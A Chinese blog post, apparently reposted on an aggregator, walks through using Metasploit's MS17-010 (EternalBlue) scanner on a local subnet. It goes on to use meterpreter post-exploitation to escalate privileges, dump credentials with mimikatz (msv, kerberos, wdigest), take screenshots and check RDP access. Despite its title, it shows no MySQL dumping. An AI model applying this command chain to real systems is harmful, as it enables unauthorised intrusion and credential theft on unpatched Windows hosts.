玩转ms17-010mysql数据库-脱裤实践

Posted tiny丶

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了玩转ms17-010mysql数据库-脱裤实践相关的知识,希望对你有一定的参考价值。

一、背景

    学习了两周的msf 还没怎么实战过,有点手痒,顺带手上任务差不多完成了,就借此机会去实践一把!

二、上手

1、指定网段扫描是否存在ms17-010漏洞

1、Use auxiliary/scanner/smb/smb_ms17_0102、Set rhosts 192.168.1.1-2553、Set threads 104、run 还真有那么几台机器没打补丁。哈哈哈 盘他

2、说盘咱就盘

 [图为示例]  咦,顺利进入 meterpreter 啦

3、首先嘛 肯定获取密码啦


getsystem - 提权

1、meterpreter > load mimikatz

2、meterpreter > msv

3、meterpreter > kerberos  获取明文密码   

help mimikatz   查看帮助

4、meterpreter > wdigest
 

4、 获取屏幕快照

1、meterpreter > screenshot

看看有没有用户登录之类的

 

5、看看是否开启了3389端口  后续可以用来远程连接!!!

以上是关于玩转ms17-010mysql数据库-脱裤实践的主要内容,如果未能解决你的问题,请参考以下文章

使用MSF通过MS17-010获取系统权限

内网渗透之ms17-010

Windows 2012 R2 不存在MS17-010

MS17-010漏洞复现

如何使用360 安装 ms17-010

永恒之蓝漏洞复现(ms17-010)